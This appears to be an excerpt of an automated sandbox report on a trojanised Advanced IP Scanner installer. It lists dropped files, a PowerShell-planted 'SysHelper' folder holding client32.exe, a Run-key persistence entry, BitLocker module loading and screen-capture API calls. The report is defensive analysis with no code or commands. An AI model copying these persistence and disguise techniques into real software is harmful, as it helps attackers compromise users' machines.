Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-3ARML.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\libeay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-J88P9.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-QNSIE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\AudioCapture.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-JMNJE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-FM5PR.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-QK8GI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\platforms\qwindows.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-T33P0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-NAJMA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-VU48S.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-UNM54.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\SysHelper\PCICHEK.DLL	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-4DCVH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\is-087J4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_685A7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,

7_2_685A7030

Boot Survival

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Network Tools			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Network Tools\Advanced IP Scanner for Windows.lnk			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyApp			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyApp			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	7_2_110251B0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	7_2_111575D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	7_2_111575D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,	7_2_11025600
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_111579D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	7_2_111579D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	7_2_110238D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	7_2_110BFDD0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11023FB0 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	7_2_11023FB0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	7_2_110CA3C0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	7_2_110CA3C0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11110220 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	7_2_11110220
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	8_2_110251B0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	8_2_111575D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	8_2_111575D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,	8_2_11025600
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_111579D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	8_2_111579D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	8_2_110238D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	8_2_110BFDD0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11023FB0 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	8_2_11023FB0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	8_2_110CA3C0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	8_2_110CA3C0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11110220 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	8_2_11110220

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

7_2_11029230

Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
